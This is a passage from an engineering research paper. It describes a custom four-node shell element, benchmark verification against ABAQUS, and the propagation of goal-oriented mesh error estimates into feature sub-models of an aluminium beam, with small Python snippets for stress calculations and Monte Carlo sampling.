\begin{aligned} C_{s}= & {} \left[ \begin{array}{cc} G &{} 0 \\ 0 &{} G \end{array} \right] , \end{aligned}
(12c)

where E and $$\nu$$ are the material Young’s modulus and Poisson’s ratio, t is the shell thickness, which is constant over the shell, and G is the shear modulus given as:

\begin{aligned} G = \kappa \frac{E t}{2(1+\nu )}, \end{aligned}
(13)

where $$\kappa$$ is an additional classical shear correction factor. 
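Equations 12a-12c and 13 translate directly into code; a minimal sketch (function name illustrative, with the conventional $$\kappa = 5/6$$ taken as a default):

```python
import numpy as np

def constitutive_matrices(E, nu, t, kappa=5.0 / 6.0):
    """Membrane, bending, and shear constitutive matrices of Eqs. 12a-12c
    for a homogeneous isotropic shell of constant thickness t."""
    # Eq. 12a: plane-stress membrane matrix
    Cm = E * t / (1.0 - nu**2) * np.array([[1.0, nu, 0.0],
                                           [nu, 1.0, 0.0],
                                           [0.0, 0.0, (1.0 - nu) / 2.0]])
    Cb = (t**2 / 12.0) * Cm                    # Eq. 12b: bending matrix
    G = kappa * E * t / (2.0 * (1.0 + nu))     # Eq. 13: corrected shear modulus
    Cs = np.array([[G, 0.0], [0.0, G]])        # Eq. 12c: shear matrix
    return Cm, Cb, Cs
```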
The coefficient is applied to take into account the thickness variation at the surface rather than the theoretically defined constant distribution for the transverse shear stress across the thickness. In accordance with , $$\kappa$$ is usually taken equal to 5/6 for a homogeneous, isotropic, rectangular section with no curvature.

The generalised strain-displacements for bending, membrane and shear are independently interpolated in the local coordinates by:

\begin{aligned} u (x,y) = \left\{ \begin{array}{c} u_x \\ u_y \\ u_z \\ \theta _{x} \\ \theta _{y} \end{array} \right\} = \sum _{n=1}^{4} N_{n}(\xi ,\eta ) u_{n}, \end{aligned}
(14)

where $$N_{n}(\xi ,\eta )$$ are the shape functions of a standard bi-linear four-node element and $$u_n$$ is the nodal deflection for node n. Strains are then computed from displacements via the localised strain matrices for the element:

\begin{aligned} \epsilon _{\alpha }(\xi ,\eta ) = B_{\alpha }(\xi ,\eta ) \{u_n\}, \end{aligned}
(15)

where the strain-displacement matrices $$B_{\alpha }$$ are defined from the derivatives of the shape functions, and $$\{u_n\}$$ is the collection of the nodal DoFs based on the ordering of $$B_\alpha$$. 
For bending $$B^{(e)}_{b}$$, membrane $$B^{(e)}_{m}$$, and shear $$B^{(e)}_{s}$$, the matrices are given as:\n\n\\begin{aligned} B^{(e)}_{b}= & {} \\left[ \\begin{array}{ccccccccccccc} 0 &{} 0 &{} 0 &{} \\frac{\\partial N_{1}}{\\partial x} &{} 0 &{} \\dots &{} 0 &{} 0 &{} 0 &{} \\frac{\\partial N_{4}}{\\partial x} &{} 0 \\\\ 0 &{} 0 &{} 0 &{} 0 &{} \\frac{\\partial N_{1}}{\\partial y} &{} \\dots &{} 0 &{} 0 &{} 0 &{} 0 &{} \\frac{\\partial N_{4}}{\\partial y} \\\\ 0 &{} 0 &{} 0 &{} \\frac{\\partial N_{1}}{\\partial y} &{} \\frac{\\partial N_{1}}{\\partial x} &{} \\dots &{} 0 &{} 0 &{} 0 &{} \\frac{\\partial N_{4}}{\\partial y} &{} \\frac{\\partial N_{4}}{\\partial x} \\end{array} \\right] \\end{aligned}\n(16a)\n\\begin{aligned} B^{(e)}_{m}= & {} \\left[ \\begin{array}{ccccccccccccc} \\frac{\\partial N_{1}}{\\partial x} &{} 0 &{} 0 &{} 0 &{} 0 &{} \\dots &{} \\frac{\\partial N_{4}}{\\partial x} &{} 0 &{} 0 &{} 0 &{} 0 \\\\ 0 &{} \\frac{\\partial N_{1}}{\\partial y} &{} 0 &{} 0 &{} 0 &{} \\dots &{} 0 &{} \\frac{\\partial N_{4}}{\\partial y} &{} 0 &{} 0 &{} 0 \\\\ \\frac{\\partial N_{1}}{\\partial y} &{} \\frac{\\partial N_{1}}{\\partial x} &{} 0 &{} 0 &{} 0 &{} \\ldots &{} \\frac{\\partial N_{4}}{\\partial y} &{} \\frac{\\partial N_{4}}{\\partial x} &{} 0 &{} 0 &{} 0 \\end{array} \\right] \\end{aligned}\n(16b)\n\\begin{aligned} B^{(e)}_{s}= & {} \\left[ \\begin{array}{ccccccccccccc} 0 &{} 0 &{} \\frac{\\partial N_{1}}{\\partial x} &{} -N_{1} &{} 0 &{} \\dots &{} 0 &{} 0 &{} \\frac{\\partial N_{4}}{\\partial x} &{} -N_{4} &{} 0 \\\\ 0 &{} 0 &{} \\frac{\\partial N_{1}}{\\partial y} &{} 0 &{} -N_{1} &{} \\dots &{} 0 &{} 0 &{} \\frac{\\partial N_{4}}{\\partial y} &{} 0 &{} -N_{4} \\end{array} \\right] . \\end{aligned}\n(16c)\n\nTo account for elements within three-dimensional coordinate space, a transformation of nodal displacements and forces from the local to the global Cartesian coordinate system is performed separately.
For each strain-displacement matrix, this rotation is performed by:\n\n\\begin{aligned} B_{\\alpha }^{\\prime } = L^{(e)}_\\alpha B_{\\alpha }, \\end{aligned}\n(17)\n\nwhere $$L^{(e)}_\\alpha$$ is the transformation matrix, which, for flat elements, is constant for all element nodes and is defined using the following expression:\n\n\\begin{aligned} L^{(e)} =\\left[ \\begin{array}{cc} \\underset{3x3}{\\lambda ^{e}} &{} 0 \\\\ 0 &{} \\underset{2x3}{{\\hat{\\lambda }}^{e}} \\end{array} \\right] , \\end{aligned}\n(18)\n\nwhere:\n\n\\begin{aligned} \\lambda ^{(e)} = \\left[ \\begin{array}{ccc} \\lambda _{x'x} &{} \\lambda _{x'y} &{} \\lambda _{x'z} \\\\ \\lambda _{y'x} &{} \\lambda _{y'y} &{} \\lambda _{y'z} \\\\ \\lambda _{z'x} &{} \\lambda _{z'y} &{} \\lambda _{z'z} \\end{array} \\right] , {\\hat{\\lambda }}^{e} = \\left[ \\begin{array}{ccc} -\\lambda _{y'x} &{} -\\lambda _{y'y} &{} -\\lambda _{y'z} \\\\ \\lambda _{x'x} &{} \\lambda _{x'y} &{} \\lambda _{x'z} \\end{array} \\right] \\end{aligned}\n(19)\n\n$$\\lambda _{x'x}$$ is the dot product (direction cosine) of the axes $$x'$$ and x, etc. . In Eq. 18, the matrix is a full 5 $$\\times$$ 6 matrix despite the $$B_\\alpha$$ matrix only having 2 or 3 rows. To alleviate this issue, only the columns of interest are considered. For example, the shear component only looks at the in-plane rotational DoF, so the transformation matrix only contains the fourth and fifth columns, making $$L_s^{(e)}$$ a 5 $$\\times$$ 2 matrix.\n\nThe element stiffness matrix is therefore obtained by numerical integration for each element by:\n\n\\begin{aligned} K^{e} = \\int _{\\Omega _{e}} B^{\\prime T}_{b} : C_{b} : B^{\\prime }_{b} d \\Omega _{e} + \\int _{\\Omega _{e}} B^{\\prime T}_{m} : C_{m} : B^{\\prime }_{m} d \\Omega _{e} + \\int _{\\Omega _{e}} B^{\\prime T}_{s} : C_{s} : B^{\\prime }_{s} d \\Omega _{e}.
\\end{aligned}\n(20)\n\nThe vector of nodal forces, equivalent to the distributed forces P, is then calculated as:\n\n\\begin{aligned} f^{e} = \\int _{\\Omega _{e}} t N \\cdot P d\\Omega _{e} + \\int _{\\Gamma _{e}} t N \\cdot {\\hat{t}} d \\Gamma _{e}, \\end{aligned}\n(21)\n\nwhere $${\\hat{t}}$$ is the surface traction prescribed on the element boundary $$\\Gamma _{e}$$. This selective integration for both the stiffness matrix and force vector, using a classical shell theory, is considered a simple procedure for avoiding shear locking of the element.\n\n#### Element formulation verification\n\nTo evaluate the performance of the custom element implementation, two benchmark studies have been investigated: Cook’s trapezoidal skew beam and the hemispherical shell with an $$18^{\\circ }$$ hole. The purpose of the verification is to assess the accuracy of the shell element (Q4) by comparing it to a referenced benchmark solution and the widely used S4 element within ABAQUS.\n\nCook’s trapezoidal beam, proposed in , is used to assess the in-plane membrane performance when loaded in shear, under moderate distortion. The standard skew beam test, represented in Fig. 2a, is defined as a tapered beam, clamped on the left edge and subjected to a uni-axial traction load. The structure has a thickness of $$h = 1.0$$ and plane-stress material properties: Young’s modulus $$E = {3}{\\times } 10^{7}$$ Pa and Poisson’s ratio $$\\nu = 1/3$$. The loading, given as $$P = 1.0$$, is specified as a uniformly distributed shear load across the right-end edge of the beam.\n\nFigure 3a,b shows the results of the normalized convergence accuracy for both the Q4 and S4 elements, for increasing $$N{\\times }N$$ element mesh densities ($$N =$$ 2, 4, 8, 16, 32 and 64), with uniform, structured mesh patterns. Reference solutions for the vertical displacement at point C, $$U_{REF(C)} = 23.96$$ (Fig.
3a), and for the maximum and minimum principal stresses at points A and B, $$\\sigma _{REF(A)} = 0.237$$ and $$\\sigma _{REF(B)} = -0.202$$ (Fig. 3b), are taken from and respectively, using a refined numerical model. The stresses at points A and B are calculated as:\n\n\\begin{aligned} \\sigma _{1,2} = \\left( \\frac{\\sigma _{x}+\\sigma _{y}}{2} \\right) \\pm \\tau _{max},\\quad \\tau _{max} = \\sqrt{ \\left( \\frac{\\sigma _{x}-\\sigma _{y}}{2} \\right) ^{2}+(\\tau _{xy})^2 }, \\end{aligned}\n(22)\n\nwhere $$\\sigma _{1,2}$$ are the principal stresses and $$\\tau _{max}$$ is the maximum in-plane shear stress. The displacement and stress results show that although the Q4 element is not as accurate for coarse meshes, both elements are sensitive to distortion in membrane deformation problems, with Q4 requiring a finer mesh to converge to the reference solution. Verification results by , using the same mesh densities, show that the measured vertical tip displacement for the Q4 element is equivalent to the MITC4 element results they present. The verification of both displacement and stress shows that the Q4 element is valid for natural values (displacement) and their derivatives (stress/strain), which are both used in the GOEE approach in this work.\n\nThe hemispherical shell with an $$18^{\\circ }$$ hole, proposed by , and represented in Fig. 2b, is investigated to evaluate the element’s performance under inextensional bending deformations and rigid body rotations normal to the shell surface. The doubly-curved hemisphere, with a radius $$R = 10.0$$, is defined as a thin shell of thickness $$h = 0.04$$, with an $$18^{\\circ }$$ open hole at the top and plane-stress material properties: Young’s modulus $$E = {6.825}{\\times } 10^{7}$$ Pa and Poisson’s ratio $$\\nu = 0.3$$. The loading is defined as two pairs of opposite radial concentrated loads, $$P = 1.0$$. Utilizing axial symmetry, one quarter of the structure, corresponding to the region ABCD, is modelled with symmetrical boundary conditions along edges AC and BC.
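Equation 22 (with the first term under the root squared, as in the standard Mohr's-circle form) translates directly into a small helper for checking the benchmark stresses. This is an illustrative sketch, not code from the paper:

```python
import numpy as np

def principal_stresses(sx, sy, txy):
    """Maximum/minimum in-plane principal stresses (Eq. 22):
    sigma_{1,2} = (sx+sy)/2 +/- sqrt(((sx-sy)/2)^2 + txy^2)."""
    centre = 0.5 * (sx + sy)
    tau_max = np.sqrt((0.5 * (sx - sy))**2 + txy**2)
    return centre + tau_max, centre - tau_max
```

For pure shear ($$\sigma_x = \sigma_y = 0$$, $$\tau_{xy} = 1$$) this returns the expected $$\pm 1$$, a quick check that the Mohr's-circle radius is computed correctly.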
As with the previous benchmark, the same element mesh densities ($$N{\\times }N$$) are evaluated, with uniform, structured mesh patterns. The radial displacement at point A, coincident with the load, $$U_{REF(A)} = 0.094$$, is used as the reference solution . The normalized convergence displacement $$(U_{A}{/}U_{REF(A)})$$ is illustrated in Fig. 3c, comparing Q4 and S4 against the referenced solution. One interesting aspect to note is the increased accuracy, even with a coarse mesh, compared to Cook’s skew beam. These two validation cases demonstrate that the Q4 element used in this work is comparable to other shell elements commonly used.\n\nCurrently, the proposed formulation is suitable for the analysis of thin shells of arbitrary shapes and has been verified against well known membrane and bending benchmark problems, with the latter agreeing well with the referenced solution even for lower mesh densities. For membrane-dominated problems, although its overall accuracy under in-plane shear deformation is reduced, it converges to an accurate solution when finer meshes are used, minimising mesh distortion. To increase overall accuracy, a shell element formulation with a second-order geometric interpolation scheme would need to be adopted, in which the bending and membrane contributions interact and cannot be treated independently using the current superposition approach . This is a subject of ongoing research. However, it should be noted that the example problems implemented in the current work avoid this complexity by implementing only thin, flat elements, with a uniform mesh.\n\n### Specifics for using the GOEE\n\nThe GOEE approach described in “Global GOEE approach” Section uses a single dual problem with a single material constitutive matrix. In this work, these two details are modified to match the desired analysis. The first detail discussed is the single material constitutive matrix.
This approach works well when the element is constructed with a single material constitutive matrix. However, this work (as described in “Custom element formulation” Section) separates the construction of the stiffness matrix into three components of bending, membrane, and shear, thus creating three material constitutive matrices.\n\nBecause the calculation of the stiffness matrix is comprised of bending, membrane, and shear components, the GOEE is also comprised of three components. The GOEE is calculated for each component then summed as:\n\n\\begin{aligned} GOEE = GOEE_b + GOEE_m + GOEE_s, \\end{aligned}\n(23)\n\nwhere $$GOEE_\\alpha$$ is the GOEE calculated with the bending, membrane, or shear material constitutive matrix. One aspect that can be noticed in “Custom element formulation” Section is that the material constitutive matrices do not span all six DoF of the system. To account for this, Eq. 9 does not use all six DoF for each component; only the DoF relevant to each component are utilized in the GOEE calculation. For example, the shear component only uses the in-plane rotational DoF. This calculation is done in a local coordinate system and then transformed back into the global coordinate system.\n\nThe second main modification is the use of multiple dual problems. In the initial approach, only one dual problem is performed. However, in this work, multiple dual problems are used since the error is required at multiple points (the boundary DoFs for the sub-model). To account for this, multiple GOEE values are also computed. For each dual problem, there is a corresponding GOEE value.
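The summation of Eq. 23 is a simple element-wise addition over the dual problems. A minimal sketch, with the per-component GOEE values assumed to have been computed already (hypothetical inputs):

```python
import numpy as np

def total_goee(goee_b, goee_m, goee_s):
    """Eq. 23: sum the GOEE evaluated with the bending, membrane and
    shear constitutive matrices. Each input is an array with one entry
    per dual problem (one per driving DoF)."""
    return np.asarray(goee_b) + np.asarray(goee_m) + np.asarray(goee_s)
```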
These values are stored and used in a method that is described in “Application to multi-scale GOEE propagation” Section.\n\n## Application to multi-scale GOEE propagation\n\nThe GOEE approach described in this paper is used to describe the meshing error in the global model in a single QoI, such as the displacement in a specific direction at a specified location (then iterated for each location and direction). To incorporate the multi-scale aspect of this work, a pre-computed sub-modelling approach (also called feature modelling) is used to take the information from the global model and estimate the quantities (specifically the element centroid stresses) within the feature model. This methodology is based on the generation of pre-computed unit normalized solutions for the sub-model. The pre-computed solution is used in a linear superposition calculation to approximate the loading on the sub-model.\n\nThe multi-scale methodology used in this work uses a two-stage multi-scale approach. This involves using two models of the local feature to generate a matrix of results for the linear superposition calculation. For clarity, the three models used in this multi-scale analysis are:\n\n1.\n\nThe global model of the entire system. This is typically constructed using only shell elements. These elements are assumed to be quadrilateral, but work is currently being performed to expand this methodology to triangular elements and to mixtures of triangular and quadrilateral elements. In the current implementation, this model is solved within Python.\n\n2.\n\nThe shell surrogate model of the local feature. This also utilizes shell elements but includes physical features such as holes and a more refined mesh. For this work, these are S4R ABAQUS shell elements.\n\n3.\n\nThe feature model of the local feature. This uses the same region as the shell surrogate model but is expanded into full 3D elements.
The mesh for the continuum elements does not necessarily correspond to the mesh of the shell surrogate due to the use of ABAQUS’s shell-to-solid sub-modelling function. This model uses C3D8R ABAQUS continuum elements.\n\nIn addition to these models, two sets of nodes are defined within these models. Driving nodes are the nodes of the global model that define the boundary of the feature. The other set is the driven nodes, comprising the boundary node set of the shell surrogate model. These two sets of nodes overlap in physical space, thus there is a 1-to-1 mapping of driving and driven nodal locations. In practice, this is not a requirement if an interpolation function is used. However, using an interpolation function can cause discontinuities and discrepancies in the energy transfer between global and feature models, so this work enforces the boundary of the shell surrogate model to have the same nodal locations as the global model while the interior contains a more refined mesh. This will be shown for the demonstration system in “Demonstration system” Section.\n\nIn order to calculate the pre-computed solution, a unit deflection is applied to each driven DoF and then propagated using the shell-to-solid procedure in ABAQUS. Simply, within the shell surrogate model, each driven DoF is individually displaced by unity while the other driven DoF are kept at zero displacement; this is looped over all driven DoF. This can be quite expensive, but it is assumed that the shell surrogate models are relatively small compared to the global model. One reason this method was chosen is due to the industrial use cases that have repeated features (such as fillets/bonds) that would use the same pre-computed results but applied at different locations. This will have different macro-level results applied to the same pre-computed solution.
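The unit-displacement loop described above can be sketched as follows. Here `solve_surrogate` is a hypothetical callable standing in for the ABAQUS shell-to-solid analysis: it takes the driven-DoF displacement vector and returns the six centroid stress components for one feature element:

```python
import numpy as np

def precompute_unit_solutions(solve_surrogate, n_driven_dof):
    """Build one element's pre-computed matrix [M]_f column by column:
    each driven DoF is displaced by unity while all others are held at
    zero, and the resulting centroid stresses form one column."""
    columns = []
    for j in range(n_driven_dof):
        u = np.zeros(n_driven_dof)
        u[j] = 1.0                      # unit displacement of driven DoF j
        columns.append(solve_surrogate(u))
    return np.column_stack(columns)     # 6 x N_DR matrix
```

For a linear solver, the j-th column of the result is exactly the response to the j-th unit vector, which is what makes the later superposition of Eq. 24 valid.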
After this calculation, the feature model directional stresses are calculated using the shell surrogate model as a base-model and the feature model as the sub-model within ABAQUS utilizing the shell-to-solid sub-modelling option. After the shell-to-solid analysis within ABAQUS, a report of the directional stresses at the centroid of each element is written and converted into a large [M] matrix of pre-computed solutions that is used for these simulations. This matrix is a collection of each element’s pre-computed solution stored in the sub-matrix $$[M]_f$$ for each element f in the feature model. The calculation of the $$[M]_f$$ matrix is performed independently of the global model with the linear superposition used to couple the global and feature models.\n\nIn order to calculate the feature model stress from the pre-computed solution, the $$[M]_f$$ matrix is used for each element via:\n\n\\begin{aligned} \\left\\{ \\begin{array}{c} \\sigma _{11} \\\\ \\sigma _{22} \\\\ \\sigma _{33} \\\\ \\sigma _{12} \\\\ \\sigma _{13} \\\\ \\sigma _{23} \\end{array}\\right\\} _f = \\left[ \\begin{array}{cccc} M_{11} &{} M_{12} &{} \\cdots &{} M_{1N_{DR}} \\\\ M_{21} &{} M_{22} &{} \\cdots &{} M_{2N_{DR}} \\\\ M_{31} &{} M_{32} &{} \\cdots &{} M_{3N_{DR}} \\\\ M_{41} &{} M_{42} &{} \\cdots &{} M_{4N_{DR}} \\\\ M_{51} &{} M_{52} &{} \\cdots &{} M_{5N_{DR}} \\\\ M_{61} &{} M_{62} &{} \\cdots &{} M_{6N_{DR}} \\\\ \\end{array}\\right] _f\\left\\{ \\begin{array}{c} U_1 \\\\ U_2 \\\\ \\vdots \\\\ U_{N_{dof}} \\end{array}\\right\\} =[M]_f \\{U\\}, \\end{aligned}\n(24)\n\nwhere $$\\sigma _{xy}$$ is the directional stress of the element centroid, $$M_{xj}$$ is the directional stress field of the feature model due to a unit displacement of driven DoF j in the shell surrogate model with a total of $$N_{DR}$$, and $$U_j$$ is the displacement of the driving DoF in the global model that corresponds to the driven DoF j. 
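Equation 24 is a single matrix-vector product per feature element, and replacing the displacements U with the GOEE values gives the stress-error estimate of Eq. 25. A minimal sketch, not the authors' code:

```python
import numpy as np

def feature_stresses(M_f, U):
    """Eq. 24: centroid stress components (s11, s22, s33, s12, s13, s23)
    of feature element f from its pre-computed matrix [M]_f (6 x N_DR)
    and the driving-DoF displacement vector U of the global model.
    Passing the GOEE vector instead of U yields Eq. 25."""
    return np.asarray(M_f) @ np.asarray(U)
```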
One aspect to note is that, for this work, each driven/driving node has 6 DoF: 3 displacement and 3 rotational. Each DoF for each driven node is utilized in the matrix [M], with the knowledge that one of the rotational DoF is zero due to the element formulation. Currently, the driving DoF are taken and applied directly to the feature model. Future work will incorporate an interpolation methodology to lessen the assumption that the global and shell surrogate models have the same boundary mesh.\n\nEquation 24 is useful for the calculation of the directional stresses. However, this work is focused on the error propagation. Through a simple variation analysis, the error on the feature model stress can be determined via the error on the displacement calculated via the GOEE. This analysis generates the equation\n\n\\begin{aligned} \\left\\{ \\begin{array}{c} \\delta \\sigma _{11} \\\\ \\delta \\sigma _{22} \\\\ \\delta \\sigma _{33} \\\\ \\delta \\sigma _{12} \\\\ \\delta \\sigma _{13} \\\\ \\delta \\sigma _{23} \\end{array}\\right\\} _f = \\left[ M\\right] _f\\left\\{ \\begin{array}{c} GOEE_1 \\\\ GOEE_2 \\\\ \\vdots \\\\ GOEE_{N_{dof}} \\end{array}\\right\\} , \\end{aligned}\n(25)\n\nwith $$\\delta \\sigma _{xy}$$ representing the expected error on the stress, $$[M]_f$$ the element pre-computed solution, and $$GOEE_j$$ the calculated GOEE for driving DoF j. To calculate the error on a failure criterion, the errors of the stress components are propagated into the feature model. Then the failure criterion is evaluated for both the nominal values and the error-adjusted values, and the difference is the reported error on the failure criterion. The main work presented in this paper assumes that the GOEE is deterministic (representing an offset) since a dual problem is performed for each driving DoF. A second analysis is also performed to quantify some of the robustness of this multi-scale methodology.
This assigns a distribution to the driving DoF and performs a Monte-Carlo simulation to give an estimate of the robustness of the various feature models. The robustness measures are the $$95\\%$$ confidence interval of the von Mises stress at the location of maximum stress and the standard deviation field. In this paper, each driving DoF distribution is treated as independent. With the variances seen in these results, this assumption does not lead to large differences between adjacent nodes. Additionally, the robustness measure presented in this work is focused mainly on showing how variability propagates into the feature model. If this approach is used for decision making, additional work might be required to determine a correlated multi-dimensional distribution for the Monte-Carlo sampling to ensure a smooth displacement field and prevent the possibility of local failures such as crack initiation.\n\nIt should be noted here that, with the a posteriori error estimates of driving DoFs in hand, a user has many options of how to take samples such that distributions in resultant quantities of interest (von Mises stresses in this work) can be developed. It is relatively straightforward, although at a larger computational cost, to develop a covariance matrix between error estimate observation points. This would allow conditional distributions in DoFs to be estimated, rather than the simple marginal approximations used here. The development of multivariate distributions will be the focus of a future publication; however, the emphasis of the present work is the implementation of GOEE methods in shell element problems with a view to propagating uncertainties.
The ease of implementation and the simplicity of the marginal sampling method are the main motivations for its application in the present work; however, readers are encouraged to note that more robust alternatives can be readily implemented.\n\nTo perform this second simulation, the nominal displacements at the driving nodes are perturbed by a normal distribution with a mean of the GOEE value calculated via the dual problems. The calculation of this distribution utilizes the limits of the error described in , where the limits of the error are based on a scaling factor of the true error. For this analysis, it is assumed that the true error is on the order of the average GOEE of the boundary nodes. In this simulation, the standard deviation for each driving node is based on a random number between zero and one and the mean GOEE for that direction among all the driving nodes. This random number is assigned per node from a standard uniform distribution. For the DoF of node n in direction k, corresponding to driving DoF j, the displacement is distributed as:\n\n\\begin{aligned} \\mathbf {U_j} \\sim U_{j0}+{\\mathcal {N}}(GOEE_{i},Uni_n*Mean_j) \\end{aligned}\n(26)\n\nwhere $$U_{j0}$$ and $$GOEE_{i}$$ are the nominal displacement and GOEE, respectively, generated from the previous analysis, $$Uni_n$$ is the random number from a standard uniform distribution for node n, and $$Mean_j$$ is the average GOEE for all the driving nodes in the direction of DoF j. It is noted that $$GOEE_i$$ corresponds to driving DoF j. In the Monte Carlo simulation, this displacement distribution is sampled and applied through Equation 25 to calculate the error of the directional stresses, then converted into the error of the von Mises stress (by taking the difference between the adjusted and the nominal von Mises stress).
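The sampling of Eq. 26 and its propagation through Eq. 25 can be sketched as below. The pre-computed matrix `M_f`, the nominal driving displacements `U0`, and the per-DoF arrays `goee`, `mean_goee` and `uni` are hypothetical inputs standing in for the quantities defined in the text; the von Mises conversion is the standard formula:

```python
import numpy as np

def von_mises(s):
    """von Mises stress from the 6 directional components
    (s11, s22, s33, s12, s13, s23)."""
    s11, s22, s33, s12, s13, s23 = s
    return np.sqrt(0.5 * ((s11 - s22)**2 + (s22 - s33)**2 + (s33 - s11)**2)
                   + 3.0 * (s12**2 + s13**2 + s23**2))

def mc_von_mises_error(M_f, U0, goee, mean_goee, uni, n_samples=1000, seed=0):
    """Monte-Carlo sampling of Eq. 26 propagated through the pre-computed
    matrix (Eq. 25). `uni` holds the per-node standard uniform draws
    (repeated for each of the node's DoF) and `mean_goee` the average
    GOEE per direction, both flattened over the driving DoF."""
    rng = np.random.default_rng(seed)
    nominal = von_mises(M_f @ U0)
    errors = np.empty(n_samples)
    for k in range(n_samples):
        # Perturbation ~ N(GOEE_j, Uni_n * Mean_j), per driving DoF
        dU = rng.normal(goee, uni * mean_goee)
        errors[k] = von_mises(M_f @ (U0 + dU)) - nominal
    return errors
```

The returned samples of the von Mises error can then be summarized into the standard deviation field and the 95% confidence interval reported in the Results section.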
One aspect to note is that since the nodal value is based on a random number, the exact values shown in this analysis are illustrative, showing the trends of how the randomness of the driving nodes in the global model affects the variability of the feature model.\n\n### Demonstration system\n\nThis work is demonstrated on a beam section to explore this methodology with a variety of local feature models, which can be seen in Fig. 4. The global system is comprised of aircraft-relevant Aluminium-2024 and has a constant thickness of 1 mm, with the red dots identifying the driving nodes of the system and where the feature is located. Although the multi-scale methodology is designed for composite materials, this system uses Aluminium. This should be considered as a preliminary step to ensure that this methodology is reasonable and provides satisfactory results. Composite materials are currently being studied and will be presented in future work.\n\nFor this system, there are 61 driving nodes with a total of 366 DoF. This results in 366 dual simulations being performed. Additionally in Fig. 4, the BC fixing the displacements at one end and the applied point force of 400 N at the other end are shown in orange. This selection of the applied force is based on the global von Mises stress: the result from the global system reaches a peak stress near the von Mises yield criterion of 265 MPa.\n\nOne of the main focuses of this work is to compare possible local features as a study of the sensitivity of this methodology to the feature model design. In total, there are four local features used, for which the shell surrogate models of each design are pictured in Fig. 5 with fully compatible boundary meshes to the global model. One aspect to note in Fig. 5 is that the features contain holes that are not modelled in the global model. This is due to the size of these holes being smaller than one element in the global model.
However, since stress concentrations are expected near holes, this multi-scale modelling approach is utilized in order to predict the stress near these holes, with the propagated GOEE used to quantify the confidence in the stress given the coarse global mesh. The various feature models are based on the initial design (Fig. 5a), which contains one hole with a diameter of 10 mm and one with a diameter of 5 mm, both in the section called the flange. This work also makes modifications to these holes as well as adding holes to the other section, called the webbing.\n\nWithin the various feature designs, one design modifies the holes of the initial design, and two designs add holes to the webbing. Figure 5b expands the small hole into a 30 mm long slot with the same diameter (5 mm). In addition to modifying the already existing holes, two modifications are added to the webbing while maintaining the nominal holes in the flange. The first design contains a 10 mm hole in Fig. 5c, and the second replaces the single large hole with three individual 5 mm holes in Fig. 5d.\n\nAnother aspect to note is the mesh on the models in Fig. 5. This mesh enforces the boundary to be compliant with the global model, such that the driven and driving nodes correspond to the same physical locations. However, due to the use of the shell-to-solid sub-modelling technique, there is no requirement for the meshes of the shell surrogate and feature model to be identical (with the only requirement being related to the number of elements through the thickness). So, for plotting the results for the local feature models, simplified, yet more refined, feature models are used. This refined mesh creates a large [M] matrix but is still feasible on a fairly standard desktop. As a test, several feature model meshes were created while keeping the shell surrogate mesh constant.
Results from these tests (not presented in this work) showed no noticeable differences, since the main calculation occurs in the shell surrogate model.\n\n## Results\n\nThe focus of this work is the multi-scale propagation of meshing error in the global model. To give a reference for the errors experienced in this system, the global model GOEE field is presented in Fig. 6. These results are the error in the displacement in the bending direction (in meters). One thing to note is that similar fields are also calculated for each of the six directions. Additionally, the propagation analysis only requires the GOEE at the driving nodes, but the GOEE is computed for the entire global model to show the overall trend of the error. Overall, the errors are small compared to the nominal deflection, so the global model mesh is well defined for this loading condition. This gives an estimate of 0.062 mm for an 8 mm deflection.\n\nSince the GOEE used in this work is based on the size of the global mesh, it is expected that a more refined mesh produces less error. While this has not been validated for the sub-modelling propagation, it has been validated on the global model. The results in demonstrate the GOEE methodology in a single-scale analysis with various meshes. It was seen that the error decreases as the mesh becomes more refined.\n\nFor comparing the propagated GOEE, there are three simulations for each local feature. The first simulation does not use the GOEE but is used as a baseline. This is the von Mises stress of the feature. As a baseline, this gives a good indicator of possible failure and a simple comparison between designs. The second simulation is the error on the von Mises stress for each feature. This is calculated via a perturbation of the propagated GOEE for the components of stress; the computed von Mises stress is then subtracted from the nominal stress profile calculated in the first simulation.
The final simulation is the robustness testing by adding a stochastic displacement of the driving DoF, propagated via Monte Carlo sampling. This Monte Carlo sampling shows two results, with the first result being the standard deviation field on the webbing and the second being the $$95\\%$$ confidence interval at the location of maximum von Mises stress found in the first simulation. The standard deviation field gives a qualitative understanding of how the error spatially affects the feature model, while the confidence interval gives a quantitative estimate of the probability of failure.\n\n### Initial design\n\nOne of the key aspects of the initial design is the two different size holes in the flange. Adding these holes, which are not part of the global model, introduces stress concentrations around the holes. To demonstrate whether there are any effects due to the stress concentrations, the results for the first two simulations for the initial design are shown in Fig. 7, with the nominal von Mises stress (in MPa) in Fig. 7a and the error of the von Mises stress (also in MPa) in Fig. 7b.\n\nThe first aspect to investigate is the nominal stress in the feature model, seen in Fig. 7a. This shows a maximum stress of 217.9 MPa at the top of the webbing. It is interesting to note the shape of the stress field. There is a gradient along the webbing with almost zero stress in the flange, with a small increase near the holes. This low stress on the flange makes sense due to the loading condition and the use of shell elements. In a shell with a small thickness, such as the ABAQUS S4R, there is very little through-thickness stiffness, so the major component of stress for these elements on the flange is due to stretching as opposed to bending. In the custom user element, the shell is assumed to be thin, so there is zero through-thickness stiffness.
For this loading condition, the global bending is much larger than the in-plane stretching, so the stress on the webbing, which experiences this bending, is much larger than in the flange. As a verification, although not shown in this work, a refined global model that contains the initial design feature was analysed. Since this is a simple and reasonably small system, this is still feasible as a validation study; this would not be feasible for a realistic system. The results from this simulation show a nearly identical von Mises stress in the feature region as well as the same field trend. There are some slight differences (less than $$1\\%$$ of the maximum stress) due to the stiffness of a continuum element compared to a shell element, but the differences in the stress are very small. This validation gives confidence in the multi-scale methodology used in this work.\n\nWhile the nominal stress gives a baseline understanding of the system, the main purpose of this work is the GOEE propagated into the feature. The error of the von Mises stress can be seen in Fig. 7b. This is calculated by applying the GOEE to the directional components of the stress, taking the von Mises stress of the adjusted stress, and then taking the difference from the nominal von Mises stress. A major result from this analysis is that the maximum error on the stress is 3.5 MPa and is located at the bottom of the webbing at one edge, with other zones of larger error also along the edge of the webbing. The location of the errors on the edge is plausible since the error originates in the global model and is propagated through the edges.
